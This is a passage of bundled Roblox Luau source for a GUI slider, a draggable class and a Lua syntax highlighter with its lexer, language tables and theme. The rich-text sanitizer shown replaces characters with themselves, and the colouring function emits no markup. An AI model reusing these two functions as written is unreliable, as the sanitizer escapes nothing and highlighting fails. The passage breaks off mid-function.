guiObjectThumbNormal:GetAttribute("IsDragging") or false guiObjectThumbPressed.Visible = attributeIsDragging end) return self end return FormSliderClass end modules[trii.ExtendDraggableClass] = function() local script = trii.ExtendDraggableClass --[[ Copyright © 2023, MapleMarvel (https://www.roblox.com/users/263710410/profile). All Rights Reserved. ExtendDraggableClass: Class that extends the object so that it can be dragged. --]] -- Class local ExtendDraggableClass = {} ExtendDraggableClass.__index = ExtendDraggableClass -- Constructor function ExtendDraggableClass.new(paramGuiObject, paramDraggingEnabled, paramDraggingDirection) local self = setmetatable({}, ExtendDraggableClass) -- Validate if paramGuiObject == nil then error("Required parameters missing for constructor ExtendDraggableClass.new.") end -- Instance Properties self.GuiObject = paramGuiObject -- The GuiObject extended by this class self.IsDragging = false -- True when the user is dragging self.DraggingEnabled = paramDraggingEnabled or true -- Enable or disable dragging self.DraggingDirection = paramDraggingDirection or Enum.Axis.X -- Direction of dragging self.DraggingIncrement = 1 -- Dragging increment for descrete intervals self.Connections = {} -- Event connections -- Initialize -- Local variables local dragInput local dragStartScreenPosition local startGuiObjectPosition local parentAbsoluteSize local cameraType -- Set attribute self.GuiObject:SetAttribute("IsDragging", self.IsDragging) -- Local function local function RoundToIncrement(paramNumber, paramMultiple) local roundedNumber = paramNumber -- Validate if paramMultiple ~= 0 then -- Rounds to nearest multiple if paramNumber > 0 then roundedNumber = math.ceil(paramNumber / paramMultiple) * paramMultiple elseif paramNumber < 0 then roundedNumber = math.floor(paramNumber / paramMultiple) * paramMultiple else roundedNumber = paramMultiple end end return roundedNumber end -- Local function local function RefreshGui(paramInput) -- Get the new position local deltaScreenPosition = paramInput.Position - dragStartScreenPosition local deltaXScale = deltaScreenPosition.X / parentAbsoluteSize.X local deltaYScale = deltaScreenPosition.Y / parentAbsoluteSize.Y local newXScale = startGuiObjectPosition.X.Scale + deltaXScale local newYScale = startGuiObjectPosition.Y.Scale + deltaYScale newXScale = RoundToIncrement(newXScale, self.DraggingIncrement / 100) newYScale = RoundToIncrement(newYScale, self.DraggingIncrement / 100) newXScale = math.round(newXScale * 10000) / 10000 -- Round to avoid roundoff errors newYScale = math.round(newYScale * 10000) / 10000 newXScale = math.clamp(newXScale, 0, 1) newYScale = math.clamp(newYScale, 0, 1) -- Horizontal or vertical direction if self.DraggingDirection == Enum.Axis.X then newYScale = startGuiObjectPosition.Y.Scale -- Ignore vertical movement else newXScale = startGuiObjectPosition.X.Scale -- Ignore horizontal movement end -- Prevent camera moving on mobile during drag if paramInput.UserInputType == Enum.UserInputType.Touch then workspace.Camera.CameraType = Enum.CameraType.Scriptable end -- Move the gui object self.GuiObject.Position = UDim2.new(newXScale, startGuiObjectPosition.X.Offset, newYScale, startGuiObjectPosition.Y.Offset) -- Reset camera on mobile if paramInput.UserInputType == Enum.UserInputType.Touch then workspace.Camera.CameraType = cameraType end end -- Disconnect existing connections local keyConnection1 = "GuiObjectInputBegan" local keyConnection2 = "GuiObjectInputChanged" local keyConnection3 = "UserInputServiceInputChanged" if self.Connections[keyConnection1] then self.Connections[keyConnection1]:Disconnect() end if self.Connections[keyConnection2] then self.Connections[keyConnection2]:Disconnect() end if self.Connections[keyConnection3] then self.Connections[keyConnection3]:Disconnect() end -- Events -- GuiObject Event - InputBegan -- Triggered when input begins on the GuiObject self.Connections[keyConnection1] = self.GuiObject.InputBegan:Connect(function(input) -- If dragging enabled if self.DraggingEnabled == true then -- Initialize dragging variables if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then self.IsDragging = true self.GuiObject:SetAttribute("IsDragging", self.IsDragging) dragStartScreenPosition = input.Position startGuiObjectPosition = self.GuiObject.Position parentAbsoluteSize = self.GuiObject.Parent.AbsoluteSize cameraType = workspace.Camera.CameraType -- Handle when dragging ends input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then self.IsDragging = false self.GuiObject:SetAttribute("IsDragging", self.IsDragging) end end) end end end) -- GuiObject Event - InputChanged -- Triggered when input changes on the GuiObject self.Connections[keyConnection2] = self.GuiObject.InputChanged:Connect(function(paramInput) -- If dragging enabled if self.DraggingEnabled == true then -- Update drag position if paramInput.UserInputType == Enum.UserInputType.MouseMovement or paramInput.UserInputType == Enum.UserInputType.Touch then dragInput = paramInput end end end) -- UserInputService Event - InputChanged -- Triggered when input changes by the user self.Connections[keyConnection3] = game:GetService("UserInputService").InputChanged:Connect(function(paramInput) -- If the user is dragging the GuiObject if paramInput == dragInput and self.IsDragging then RefreshGui(paramInput) end end) return self end -- Instance Methods -- SetDraggingEnabled function ExtendDraggableClass:SetDraggingEnabled(paramIsEnabled) -- Validate if paramIsEnabled ~= nil then -- Update property self.DraggingEnabled = paramIsEnabled -- Update property if not paramIsEnabled then self.IsDragging = false self.GuiObject:SetAttribute("IsDragging", self.IsDragging) end end end -- SetDraggingIncrement function ExtendDraggableClass:SetDraggingIncrement(paramIncrement) -- Validate if paramIncrement ~= nil then -- Update property self.DraggingIncrement = paramIncrement end end return ExtendDraggableClass end modules[trii.Highlighter] = function() local script = trii.Highlighter local types = require(script.types) local utility = require(script.utility) local theme = require(script.theme) local Highlighter = { defaultLexer = require(script.lexer) :: types.Lexer, _textObjectData = {} :: { [types.TextObject]: types.ObjectData }, _cleanups = {} :: { [types.TextObject]: () -> () }, } --[[ Gathers the info that is needed in order to set up a line label. ]] function Highlighter._getLabelingInfo(textObject: types.TextObject) local data = Highlighter._textObjectData[textObject] if not data then return end local src = utility.convertTabsToSpaces(utility.removeControlChars(textObject.Text)) local numLines = #string.split(src, "\n") if numLines == 0 then return end local textBounds = utility.getTextBounds(textObject) local textHeight = textBounds.Y / numLines return { data = data, numLines = numLines, textBounds = textBounds, textHeight = textHeight, innerAbsoluteSize = utility.getInnerAbsoluteSize(textObject), textColor = theme.getColor("iden"), textFont = textObject.FontFace, textSize = textObject.TextSize, labelSize = UDim2.new(1, 0, 0, math.ceil(textHeight)), } end --[[ Aligns and matches the line labels to the textObject. ]] function Highlighter._alignLabels(textObject: types.TextObject) local labelingInfo = Highlighter._getLabelingInfo(textObject) if not labelingInfo then return end for lineNumber, lineLabel in labelingInfo.data.Labels do -- Align line label lineLabel.TextColor3 = labelingInfo.textColor lineLabel.FontFace = labelingInfo.textFont lineLabel.TextSize = labelingInfo.textSize lineLabel.Size = labelingInfo.labelSize lineLabel.Position = UDim2.fromScale(0, labelingInfo.textHeight * (lineNumber - 1) / labelingInfo.innerAbsoluteSize.Y) end end --[[ Creates and populates the line labels with the appropriate rich text. ]] function Highlighter._populateLabels(props: types.HighlightProps) -- Gather props local textObject = props.textObject local src = utility.convertTabsToSpaces(utility.removeControlChars(props.src or textObject.Text)) local lexer = props.lexer or Highlighter.defaultLexer local customLang = props.customLang local forceUpdate = props.forceUpdate -- Avoid updating when unnecessary local data = Highlighter._textObjectData[textObject] if (data == nil) or (data.Text == src) then if forceUpdate ~= true then return end end -- Ensure textObject matches sanitized src textObject.Text = src local lineLabels = data.Labels local previousLines = data.Lines local lines = string.split(src, "\n") data.Lines = lines data.Text = src data.Lexer = lexer data.CustomLang = customLang -- Shortcut empty textObjects if src == "" then for l = 1, #lineLabels do if lineLabels[l].Text == "" then continue end lineLabels[l].Text = "" end return end local idenColor = theme.getColor("iden") local labelingInfo = Highlighter._getLabelingInfo(textObject) local richTextBuffer, bufferIndex, lineNumber = table.create(5), 0, 1 for token: types.TokenName, content: string in lexer.scan(src) do local Color = if customLang and customLang[content] then theme.getColor("custom") else theme.getColor(token) or idenColor local tokenLines = string.split(utility.sanitizeRichText(content), "\n") for l, tokenLine in tokenLines do -- Find line label local lineLabel = lineLabels[lineNumber] if not lineLabel then local newLabel = Instance.new("TextLabel") newLabel.Name = "Line_" .. lineNumber newLabel.AutoLocalize = false newLabel.RichText = true newLabel.BackgroundTransparency = 1 newLabel.Text = "" newLabel.TextXAlignment = Enum.TextXAlignment.Left newLabel.TextYAlignment = Enum.TextYAlignment.Top newLabel.TextColor3 = labelingInfo.textColor newLabel.FontFace = labelingInfo.textFont newLabel.TextSize = labelingInfo.textSize newLabel.Size = labelingInfo.labelSize newLabel.Position = UDim2.fromScale(0, labelingInfo.textHeight * (lineNumber - 1) / labelingInfo.innerAbsoluteSize.Y) newLabel.Parent = textObject.SyntaxHighlights lineLabels[lineNumber] = newLabel lineLabel = newLabel end -- If multiline token, then set line & move to next if l > 1 then if forceUpdate or lines[lineNumber] ~= previousLines[lineNumber] then -- Set line lineLabels[lineNumber].Text = table.concat(richTextBuffer) end -- Move to next line lineNumber += 1 bufferIndex = 0 table.clear(richTextBuffer) end -- If changed, add token to line if forceUpdate or lines[lineNumber] ~= previousLines[lineNumber] then bufferIndex += 1 -- Only add RichText tags when the color is non-default and the characters are non-whitespace if Color ~= idenColor and string.find(tokenLine, "[%S%C]") then richTextBuffer[bufferIndex] = theme.getColoredRichText(Color, tokenLine) else richTextBuffer[bufferIndex] = tokenLine end end end end -- Set final line if richTextBuffer[1] and lineLabels[lineNumber] then lineLabels[lineNumber].Text = table.concat(richTextBuffer) end -- Clear unused line labels for l = lineNumber + 1, #lineLabels do if lineLabels[l].Text == "" then continue end lineLabels[l].Text = "" end end --[[ Highlights the given textObject with the given props and returns a cleanup function. Highlighting will automatically update when needed, so the cleanup function will disconnect those connections and remove all labels. ]] function Highlighter.highlight(props: types.HighlightProps): () -> () -- Gather props local textObject = props.textObject local src = utility.convertTabsToSpaces(utility.removeControlChars(props.src or textObject.Text)) local lexer = props.lexer or Highlighter.defaultLexer local customLang = props.customLang -- Avoid updating when unnecessary if Highlighter._cleanups[textObject] then -- Already been initialized, so just update Highlighter._populateLabels(props) Highlighter._alignLabels(textObject) return Highlighter._cleanups[textObject] end -- Ensure valid object properties textObject.RichText = false textObject.Text = src textObject.TextXAlignment = Enum.TextXAlignment.Left textObject.TextYAlignment = Enum.TextYAlignment.Top textObject.BackgroundColor3 = theme.getColor("background") textObject.TextColor3 = theme.getColor("iden") textObject.TextTransparency = 0.5 -- Build the highlight labels local lineFolder = textObject:FindFirstChild("SyntaxHighlights") if lineFolder == nil then local newLineFolder = Instance.new("Folder") newLineFolder.Name = "SyntaxHighlights" newLineFolder.Parent = textObject lineFolder = newLineFolder end local data = { Text = "", Labels = {}, Lines = {}, Lexer = lexer, CustomLang = customLang, } Highlighter._textObjectData[textObject] = data -- Add a cleanup handler for this textObject local connections: { [string]: RBXScriptConnection } = {} local function cleanup() lineFolder:Destroy() Highlighter._textObjectData[textObject] = nil Highlighter._cleanups[textObject] = nil for _key, connection in connections do connection:Disconnect() end table.clear(connections) end Highlighter._cleanups[textObject] = cleanup connections["AncestryChanged"] = textObject.AncestryChanged:Connect(function() if textObject.Parent then return end cleanup() end) connections["TextChanged"] = textObject:GetPropertyChangedSignal("Text"):Connect(function() Highlighter._populateLabels(props) end) connections["TextBoundsChanged"] = textObject:GetPropertyChangedSignal("TextBounds"):Connect(function() Highlighter._alignLabels(textObject) end) connections["AbsoluteSizeChanged"] = textObject:GetPropertyChangedSignal("AbsoluteSize"):Connect(function() Highlighter._alignLabels(textObject) end) connections["FontFaceChanged"] = textObject:GetPropertyChangedSignal("FontFace"):Connect(function() Highlighter._alignLabels(textObject) end) -- Populate the labels Highlighter._populateLabels(props) Highlighter._alignLabels(textObject) return cleanup end --[[ Refreshes all highlighted textObjects. Used when the theme changes. ]] function Highlighter.refresh(): () -- Rehighlight existing labels using latest colors for textObject, data in Highlighter._textObjectData do for _, lineLabel in data.Labels do lineLabel.TextColor3 = theme.getColor("iden") end Highlighter.highlight({ textObject = textObject, forceUpdate = true, src = data.Text, lexer = data.Lexer, customLang = data.CustomLang, }) end end --[[ Sets the token colors to the given colors and refreshes all highlighted textObjects. ]] function Highlighter.setTokenColors(colors: types.TokenColors): () theme.setColors(colors) Highlighter.refresh() end --[[ Gets a token color by name. Mainly useful for setting "background" token color on other UI objects behind your text. ]] function Highlighter.getTokenColor(tokenName: types.TokenName): Color3 return theme.getColor(tokenName) end --[[ Matches the token colors to the Studio theme settings and refreshes all highlighted textObjects. Does nothing when not run in a Studio plugin. ]] function Highlighter.matchStudioSettings(): () local applied = theme.matchStudioSettings(Highlighter.refresh) if applied then Highlighter.refresh() end end return Highlighter end modules[trii.lexer] = function() local script = trii.lexer --[=[ Lexical scanner for creating a sequence of tokens from Lua source code. This is a heavily modified and Roblox-optimized version of the original Penlight Lexer module: https://github.com/stevedonovan/Penlight Authors: stevedonovan ----------- Original Penlight lexer author ryanjmulder ------------- Penlight lexer contributer mpeterv --------------------- Penlight lexer contributer Tieske ----------------------- Penlight lexer contributer boatbomber --------------- Roblox port, added builtin token, added patterns for incomplete syntax, bug fixes, behavior changes, token optimization, thread optimization Added lexer.navigator() for non-sequential reads Sleitnick ----------------- Roblox optimizations howmanysmall ----------- Lua + Roblox optimizations List of possible tokens: - iden - keyword - builtin - string - number - comment - operator --]=] local lexer = {} local Prefix, Suffix, Cleaner = "^[%c%s]*", "[%c%s]*", "[%c%s]+" local UNICODE = "[%z\x01-\x7F\xC2-\xF4][\x80-\xBF]+" local NUMBER_A = "0[xX][%da-fA-F_]+" local NUMBER_B = "0[bB][01_]+" local NUMBER_C = "%d+%.?%d*[eE][%+%-]?%d+" local NUMBER_D = "%d+[%._]?[%d_eE]*" local OPERATORS = "[:;<>/~%*%(%)%-={},%.#%^%+%%]+" local BRACKETS = "[%[%]]+" -- needs to be separate pattern from other operators or it'll mess up multiline strings local IDEN = "[%a_][%w_]*" local STRING_EMPTY = "(['\"])%1" --Empty String local STRING_PLAIN = "(['\"])[^\n]-([^\\]%1)" --TODO: Handle escaping escapes local STRING_INTER = "`[^\n]-`" local STRING_INCOMP_A = "(['\"]).-\n" --Incompleted String with next line local STRING_INCOMP_B = "(['\"])[^\n]*" --Incompleted String without next line local STRING_MULTI = "%[(=*)%[.-%]%1%]" --Multiline-String local STRING_MULTI_INCOMP = "%[=*%[.-.*" --Incompleted Multiline-String local COMMENT_MULTI = "%-%-%[(=*)%[.-%]%1%]" --Completed Multiline-Comment local COMMENT_MULTI_INCOMP = "%-%-%[=*%[.-.*" --Incompleted Multiline-Comment local COMMENT_PLAIN = "%-%-.-\n" --Completed Singleline-Comment local COMMENT_INCOMP = "%-%-.*" --Incompleted Singleline-Comment -- local TYPED_VAR = ":%s*([%w%?%| \t]+%s*)" --Typed variable, parameter, function local lang = require(script.language) local lua_keyword = lang.keyword local lua_builtin = lang.builtin local lua_libraries = lang.libraries lexer.language = lang local lua_matches = { -- Indentifiers { Prefix .. IDEN .. Suffix, "var" }, -- Numbers { Prefix .. NUMBER_A .. Suffix, "number" }, { Prefix .. NUMBER_B .. Suffix, "number" }, { Prefix .. NUMBER_C .. Suffix, "number" }, { Prefix .. NUMBER_D .. Suffix, "number" }, -- Strings { Prefix .. STRING_EMPTY .. Suffix, "string" }, { Prefix .. STRING_PLAIN .. Suffix, "string" }, { Prefix .. STRING_INCOMP_A .. Suffix, "string" }, { Prefix .. STRING_INCOMP_B .. Suffix, "string" }, { Prefix .. STRING_MULTI .. Suffix, "string" }, { Prefix .. STRING_MULTI_INCOMP .. Suffix, "string" }, { Prefix .. STRING_INTER .. Suffix, "string_inter" }, -- Comments { Prefix .. COMMENT_MULTI .. Suffix, "comment" }, { Prefix .. COMMENT_MULTI_INCOMP .. Suffix, "comment" }, { Prefix .. COMMENT_PLAIN .. Suffix, "comment" }, { Prefix .. COMMENT_INCOMP .. Suffix, "comment" }, -- Operators { Prefix .. OPERATORS .. Suffix, "operator" }, { Prefix .. BRACKETS .. Suffix, "operator" }, -- Unicode { Prefix .. UNICODE .. Suffix, "iden" }, -- Unknown { "^.", "iden" }, } -- To reduce the amount of table indexing during lexing, we separate the matches now local PATTERNS, TOKENS = {}, {} for i, m in lua_matches do PATTERNS[i] = m[1] TOKENS[i] = m[2] end --- Create a plain token iterator from a string. -- @tparam string s a string. function lexer.scan(s: string) local index = 1 local size = #s local previousContent1, previousContent2, previousContent3, previousToken = "", "", "", "" local thread = coroutine.create(function() while index <= size do local matched = false for tokenType, pattern in ipairs(PATTERNS) do -- Find match local start, finish = string.find(s, pattern, index) if start == nil then continue end -- Move head index = finish + 1 matched = true -- Gather results local content = string.sub(s, start, finish) local rawToken = TOKENS[tokenType] local processedToken = rawToken -- Process token if rawToken == "var" then -- Since we merge spaces into the tok, we need to remove them -- in order to check the actual word it contains local cleanContent = string.gsub(content, Cleaner, "") if lua_keyword[cleanContent] then processedToken = "keyword" elseif lua_builtin[cleanContent] then processedToken = "builtin" elseif string.find(previousContent1, "%.[%s%c]*$") and previousToken ~= "comment" then -- The previous was a . so we need to special case indexing things local parent = string.gsub(previousContent2, Cleaner, "") local lib = lua_libraries[parent] if lib and lib[cleanContent] and not string.find(previousContent3, "%.[%s%c]*$") then -- Indexing a builtin lib with existing item, treat as a builtin processedToken = "builtin" else -- Indexing a non builtin, can't be treated as a keyword/builtin processedToken = "iden" end -- print("indexing",parent,"with",cleanTok,"as",t2) else processedToken = "iden" end elseif rawToken == "string_inter" then if not string.find(content, "[^\\]{") then -- This inter string doesnt actually have any inters processedToken = "string" else -- We're gonna do our own yields, so the main loop won't need to -- Our yields will be a mix of string and whatever is inside the inters processedToken = nil local isString = true local subIndex = 1 local subSize = #content while subIndex <= subSize do -- Find next brace local subStart, subFinish = string.find(content, "^.-[^\\][{}]", subIndex) if subStart == nil then -- No more braces, all string coroutine.yield("string", string.sub(content, subIndex)) break end if isString then -- We are currently a string subIndex = subFinish + 1 coroutine.yield("string", string.sub(content, subStart, subFinish)) -- This brace opens code isString = false else -- We are currently in code subIndex = subFinish local subContent = string.sub(content, subStart, subFinish - 1) for innerToken, innerContent in lexer.scan(subContent) do coroutine.yield(innerToken, innerContent) end -- This brace opens string/closes code isString = true end end end end -- Record last 3 tokens for the indexing context check previousContent3 = previousContent2 previousContent2 = previousContent1 previousContent1 = content previousToken = processedToken or rawToken if processedToken then coroutine.yield(processedToken, content) end break end -- No matches found if not matched then return end end -- Completed the scan return end) return function() if coroutine.status(thread) == "dead" then return end local success, token, content = coroutine.resume(thread) if success and token then return token, content end return end end function lexer.navigator() local nav = { Source = "", TokenCache = table.create(50), _RealIndex = 0, _UserIndex = 0, _ScanThread = nil, } function nav:Destroy() self.Source = nil self._RealIndex = nil self._UserIndex = nil self.TokenCache = nil self._ScanThread = nil end function nav:SetSource(SourceString) self.Source = SourceString self._RealIndex = 0 self._UserIndex = 0 table.clear(self.TokenCache) self._ScanThread = coroutine.create(function() for Token, Src in lexer.scan(self.Source) do self._RealIndex += 1 self.TokenCache[self._RealIndex] = { Token, Src } coroutine.yield(Token, Src) end end) end function nav.Next() nav._UserIndex += 1 if nav._RealIndex >= nav._UserIndex then -- Already scanned, return cached return table.unpack(nav.TokenCache[nav._UserIndex]) else if coroutine.status(nav._ScanThread) == "dead" then -- Scan thread dead return else local success, token, src = coroutine.resume(nav._ScanThread) if success and token then -- Scanned new data return token, src else -- Lex completed return end end end end function nav.Peek(PeekAmount) local GoalIndex = nav._UserIndex + PeekAmount if nav._RealIndex >= GoalIndex then -- Already scanned, return cached if GoalIndex > 0 then return table.unpack(nav.TokenCache[GoalIndex]) else -- Invalid peek return end else if coroutine.status(nav._ScanThread) == "dead" then -- Scan thread dead return else local IterationsAway = GoalIndex - nav._RealIndex local success, token, src = nil, nil, nil for _ = 1, IterationsAway do success, token, src = coroutine.resume(nav._ScanThread) if not (success or token) then -- Lex completed break end end return token, src end end end return nav end return lexer end modules[trii.language] = function() local script = trii.language local language = { keyword = { ["and"] = "keyword", ["break"] = "keyword", ["continue"] = "keyword", ["do"] = "keyword", ["else"] = "keyword", ["elseif"] = "keyword", ["end"] = "keyword", ["export"] = "keyword", ["false"] = "keyword", ["for"] = "keyword", ["function"] = "keyword", ["if"] = "keyword", ["in"] = "keyword", ["local"] = "keyword", ["nil"] = "keyword", ["not"] = "keyword", ["or"] = "keyword", ["repeat"] = "keyword", ["return"] = "keyword", ["self"] = "keyword", ["then"] = "keyword", ["true"] = "keyword", ["type"] = "keyword", ["typeof"] = "keyword", ["until"] = "keyword", ["while"] = "keyword", }, builtin = { -- Luau Functions ["assert"] = "function", ["error"] = "function", ["getfenv"] = "function", ["getmetatable"] = "function", ["ipairs"] = "function", ["loadstring"] = "function", ["newproxy"] = "function", ["next"] = "function", ["pairs"] = "function", ["pcall"] = "function", ["print"] = "function", ["rawequal"] = "function", ["rawget"] = "function", ["rawlen"] = "function", ["rawset"] = "function", ["select"] = "function", ["setfenv"] = "function", ["setmetatable"] = "function", ["tonumber"] = "function", ["tostring"] = "function", ["unpack"] = "function", ["xpcall"] = "function", -- Luau Functions (Deprecated) ["collectgarbage"] = "function", -- Luau Variables ["_G"] = "table", ["_VERSION"] = "string", -- Luau Tables ["bit32"] = "table", ["coroutine"] = "table", ["debug"] = "table", ["math"] = "table", ["os"] = "table", ["string"] = "table", ["table"] = "table", ["utf8"] = "table", -- Roblox Functions ["DebuggerManager"] = "function", ["delay"] = "function", ["gcinfo"] = "function", ["PluginManager"] = "function", ["require"] = "function", ["settings"] = "function", ["spawn"] = "function", ["tick"] = "function", ["time"] = "function", ["UserSettings"] = "function", ["wait"] = "function", ["warn"] = "function", -- Roblox Functions (Deprecated) ["Delay"] = "function", ["ElapsedTime"] = "function", ["elapsedTime"] = "function", ["printidentity"] = "function", ["Spawn"] = "function", ["Stats"] = "function", ["stats"] = "function", ["Version"] = "function", ["version"] = "function", ["Wait"] = "function", ["ypcall"] = "function", -- Roblox Variables ["game"] = "Instance", ["plugin"] = "Instance", ["script"] = "Instance", ["shared"] = "Instance", ["workspace"] = "Instance", -- Roblox Variables (Deprecated) ["Game"] = "Instance", ["Workspace"] = "Instance", -- Roblox Tables ["Axes"] = "table", ["BrickColor"] = "table", ["CatalogSearchParams"] = "table", ["CFrame"] = "table", ["Color3"] = "table", ["ColorSequence"] = "table", ["ColorSequenceKeypoint"] = "table", ["DateTime"] = "table", ["DockWidgetPluginGuiInfo"] = "table", ["Enum"] = "table", ["Faces"] = "table", ["FloatCurveKey"] = "table", ["Font"] = "table", ["Instance"] = "table", ["NumberRange"] = "table", ["NumberSequence"] = "table", ["NumberSequenceKeypoint"] = "table", ["OverlapParams"] = "table", ["PathWaypoint"] = "table", ["PhysicalProperties"] = "table", ["Random"] = "table", ["Ray"] = "table", ["RaycastParams"] = "table", ["Rect"] = "table", ["Region3"] = "table", ["Region3int16"] = "table", ["RotationCurveKey"] = "table", ["SharedTable"] = "table", ["task"] = "table", ["TweenInfo"] = "table", ["UDim"] = "table", ["UDim2"] = "table", ["Vector2"] = "table", ["Vector2int16"] = "table", ["Vector3"] = "table", ["Vector3int16"] = "table", }, libraries = { -- Luau Libraries bit32 = { arshift = "function", band = "function", bnot = "function", bor = "function", btest = "function", bxor = "function", countlz = "function", countrz = "function", extract = "function", lrotate = "function", lshift = "function", replace = "function", rrotate = "function", rshift = "function", }, coroutine = { close = "function", create = "function", isyieldable = "function", resume = "function", running = "function", status = "function", wrap = "function", yield = "function", }, debug = { dumpheap = "function", getmemorycategory = "function", info = "function", loadmodule = "function", profilebegin = "function", profileend = "function", resetmemorycategory = "function", setmemorycategory = "function", traceback = "function", }, math = { abs = "function", acos = "function", asin = "function", atan2 = "function", atan = "function", ceil = "function", clamp = "function", cos = "function", cosh = "function", deg = "function", exp = "function", floor = "function", fmod = "function", frexp = "function", ldexp = "function", log10 = "function", log = "function", max = "function", min = "function", modf = "function", noise = "function", pow = "function", rad = "function", random = "function", randomseed = "function", round = "function", sign = "function", sin = "function", sinh = "function", sqrt = "function", tan = "function", tanh = "function", huge = "number", pi = "number", }, os = { clock = "function", date = "function", difftime = "function", time = "function", }, string = { byte = "function", char = "function", find = "function", format = "function", gmatch = "function", gsub = "function", len = "function", lower = "function", match = "function", pack = "function", packsize = "function", rep = "function", reverse = "function", split = "function", sub = "function", unpack = "function", upper = "function", }, table = { clear = "function", clone = "function", concat = "function", create = "function", find = "function", foreach = "function", foreachi = "function", freeze = "function", getn = "function", insert = "function", isfrozen = "function", maxn = "function", move = "function", pack = "function", remove = "function", sort = "function", unpack = "function", }, utf8 = { char = "function", codepoint = "function", codes = "function", graphemes = "function", len = "function", nfcnormalize = "function", nfdnormalize = "function", offset = "function", charpattern = "string", }, -- Roblox Libraries Axes = { new = "function", }, BrickColor = { Black = "function", Blue = "function", DarkGray = "function", Gray = "function", Green = "function", new = "function", New = "function", palette = "function", Random = "function", random = "function", Red = "function", White = "function", Yellow = "function", }, CatalogSearchParams = { new = "function", }, CFrame = { Angles = "function", fromAxisAngle = "function", fromEulerAngles = "function", fromEulerAnglesXYZ = "function", fromEulerAnglesYXZ = "function", fromMatrix = "function", fromOrientation = "function", lookAt = "function", new = "function", identity = "CFrame", }, Color3 = { fromHex = "function", fromHSV = "function", fromRGB = "function", new = "function", toHSV = "function", }, ColorSequence = { new = "function", }, ColorSequenceKeypoint = { new = "function", }, DateTime = { fromIsoDate = "function", fromLocalTime = "function", fromUniversalTime = "function", fromUnixTimestamp = "function", fromUnixTimestampMillis = "function", now = "function", }, DockWidgetPluginGuiInfo = { new = "function", }, Enum = {}, Faces = { new = "function", }, FloatCurveKey = { new = "function", }, Font = { fromEnum = "function", fromId = "function", fromName = "function", new = "function", }, Instance = { new = "function", }, NumberRange = { new = "function", }, NumberSequence = { new = "function", }, NumberSequenceKeypoint = { new = "function", }, OverlapParams = { new = "function", }, PathWaypoint = { new = "function", }, PhysicalProperties = { new = "function", }, Random = { new = "function", }, Ray = { new = "function", }, RaycastParams = { new = "function", }, Rect = { new = "function", }, Region3 = { new = "function", }, Region3int16 = { new = "function", }, RotationCurveKey = { new = "function", }, SharedTable = { clear = "function", clone = "function", cloneAndFreeze = "function", increment = "function", isFrozen = "function", new = "function", size = "function", update = "function", }, task = { cancel = "function", defer = "function", delay = "function", desynchronize = "function", spawn = "function", synchronize = "function", wait = "function", }, TweenInfo = { new = "function", }, UDim = { new = "function", }, UDim2 = { fromOffset = "function", fromScale = "function", new = "function", }, Vector2 = { new = "function", one = "Vector2", xAxis = "Vector2", yAxis = "Vector2", zero = "Vector2", }, Vector2int16 = { new = "function", }, Vector3 = { fromAxis = "function", FromAxis = "function", fromNormalId = "function", FromNormalId = "function", new = "function", one = "Vector3", xAxis = "Vector3", yAxis = "Vector3", zAxis = "Vector3", zero = "Vector3", }, Vector3int16 = { new = "function", }, }, } -- Filling up language.libraries.Enum table local enumLibraryTable = language.libraries.Enum for _, enum in ipairs(Enum:GetEnums()) do --TODO: Remove tostring from here once there is a better way to get the name of an Enum enumLibraryTable[tostring(enum)] = "Enum" end return language end modules[trii.theme] = function() local script = trii.theme local DEFAULT_TOKEN_COLORS = { ["background"] = Color3.fromRGB(47, 47, 47), ["iden"] = Color3.fromRGB(234, 234, 234), ["keyword"] = Color3.fromRGB(215, 174, 255), ["builtin"] = Color3.fromRGB(131, 206, 255), ["string"] = Color3.fromRGB(196, 255, 193), ["number"] = Color3.fromRGB(255, 125, 125), ["comment"] = Color3.fromRGB(140, 140, 155), ["operator"] = Color3.fromRGB(255, 239, 148), ["custom"] = Color3.fromRGB(119, 122, 255), } local types = require(script.Parent.types) local Theme = { tokenColors = {}, tokenRichTextFormatter = {}, } function Theme.setColors(tokenColors: types.TokenColors) assert(type(tokenColors) == "table", "Theme.updateColors expects a table") for tokenName, color in tokenColors do Theme.tokenColors[tokenName] = color end end function Theme.getColoredRichText(color: Color3, text: string): string return '' .. text .. "" end function Theme.getColor(tokenName: types.TokenName): Color3 return Theme.tokenColors[tokenName] end function Theme.matchStudioSettings(refreshCallback: () -> ()): boolean local success = pcall(function() -- When not used in a Studio plugin, this will error -- and the pcall will just silently return local studio = settings().Studio local studioTheme = studio.Theme local function getTokens() return { ["background"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptBackground), ["iden"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptText), ["keyword"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptKeyword), ["builtin"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptBuiltInFunction), ["string"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptString), ["number"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptNumber), ["comment"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptComment), ["operator"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptOperator), ["custom"] = studioTheme:GetColor(Enum.StudioStyleGuideColor.ScriptBool), } end Theme.setColors(getTokens()) studio.ThemeChanged:Connect(function() studioTheme = studio.Theme Theme.setColors(getTokens()) refreshCallback() end) end) return success end -- Initialize Theme.setColors(DEFAULT_TOKEN_COLORS) return Theme end modules[trii.types] = function() local script = trii.types export type TextObject = TextLabel | TextBox export type TokenName = "background" | "iden" | "keyword" | "builtin" | "string" | "number" | "comment" | "operator" | "custom" export type TokenColors = { ["background"]: Color3?, ["iden"]: Color3?, ["keyword"]: Color3?, ["builtin"]: Color3?, ["string"]: Color3?, ["number"]: Color3?, ["comment"]: Color3?, ["operator"]: Color3?, ["custom"]: Color3?, } export type HighlightProps = { textObject: TextObject, src: string?, forceUpdate: boolean?, lexer: Lexer?, customLang: { [string]: string }?, } export type Lexer = { scan: (src: string) -> () -> (string, string), navigator: () -> any, finished: boolean?, } export type ObjectData = { Text: string, Labels: { TextLabel }, Lines: { string }, Lexer: Lexer?, CustomLang: { [string]: string }?, } return nil end modules[trii.utility] = function() local script = trii.utility local types = require(script.Parent.types) local Utility = {} function Utility.sanitizeRichText(s: string): string return string.gsub( string.gsub(string.gsub(string.gsub(string.gsub(s, "&", "&"), "<", "<"), ">", ">"), '"', """), "'", "'" ) end function Utility.convertTabsToSpaces(s: string): string return 